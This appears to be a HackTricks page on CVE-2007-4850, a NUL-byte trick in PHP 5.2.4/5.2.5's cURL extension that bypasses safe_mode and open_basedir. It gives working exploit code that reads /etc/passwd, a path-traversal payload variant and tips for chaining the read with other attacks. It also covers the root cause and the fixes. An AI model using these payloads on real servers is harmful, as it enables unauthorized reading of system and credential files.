PHP 5.2.4 and 5.2.5 PHP cURL

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

This page documents a legacy but still useful-in-CTFs/local-legacy-installs trick to bypass PHP safe_mode/open_basedir checks using the cURL extension on specific PHP 5.2.x builds.

  • Affected: PHP 5.2.4 and 5.2.5 with ext/curl enabled.
  • Impact: Read arbitrary local files despite safe_mode or open_basedir restrictions (no direct code execution).
  • ID: CVE-2007-4850.

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

One-liner PoC

If safe_mode or open_basedir are active and cURL is enabled, the following will return the contents of the current script:

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

More explicit PoC (arbitrary file read)

<?php
// Preconditions (legacy): PHP 5.2.4/5.2.5, safe_mode or open_basedir enabled, ext/curl loaded
$target = '/etc/passwd'; // change to the file you want to read
$ch = curl_init();
// The trick is the NUL byte (\x00). Prefix can be any string; checks are confused and the file after the NUL is read.
curl_setopt($ch, CURLOPT_URL, 'file://prefix'.chr(0).$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$resp = curl_exec($ch);
$err  = curl_error($ch);
curl_close($ch);
if ($resp !== false) {
    echo $resp; // should contain the target file
} else {
    echo "cURL error: $err\n";
}
?>

Notes:

  • Use double quotes or chr(0) to inject a real NUL byte. Percent-encoding (%00) will not work reliably.
  • This is a file read primitive. Combine with other primitives (log poisoning, session file inclusion, etc.) for further escalation when possible.

Why this works (short)

The vulnerability lies in how PHP 5.2.4/5.2.5 performed safe_mode/open_basedir checks for file:// URLs in ext/curl. The check parsed the URL and validated a path component, but due to NUL-byte handling it validated a different string than the one actually used by libcurl. In practice, the validator could approve the path after the NUL while libcurl used the part before the NUL as the URL container, enabling a bypass that results in reading the file placed after the NUL byte. See the original analysis and the affected macro in curl/interface.c for details. [CVE-2007-4850].

Constraints and fixes

  • Fixed in later 5.2.x (e.g., distro builds patched to 5.2.6) by correcting the parsing/validation in ext/curl.
  • Only affects very old PHP deployments; safe_mode was removed in PHP 5.4 and modern builds do not exhibit this behavior.
  • CVE-2006-2563 (PHP 4.4.2/5.1.4): libcurl wrappers allowed file:// access with embedded NULs to bypass open_basedir; fixed before 5.2.x.
  • PHP bugs #30609/#36223 tracked early cURL open_basedir issues using file:// without canonicalization. Any check before the NUL byte or without realpath-style resolution is prone to the same truncation.

CTF tips

  • When you identify PHP 5.2.4/5.2.5 with ext/curl loaded (look for cURL support => enabled in phpinfo() and the exact PHP Version), this trick usually works even if allow_url_fopen is disabled because ext/curl handles file:// itself.
  • If direct paths are blocked, try relative traversal after the NUL, e.g. file://x\x00../../../../etc/passwd. The traversal is resolved by libcurl, not by the open_basedir guard.
  • You can wrap the payload in a single HTTP request body to trigger the LFI through vulnerable server-side code that mirrors user-controlled URLs into curl_exec() (common in legacy SSRF-like endpoints).

See also

Other disable_functions/open_basedir bypasses and modern techniques are collected here:

HackTricks

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks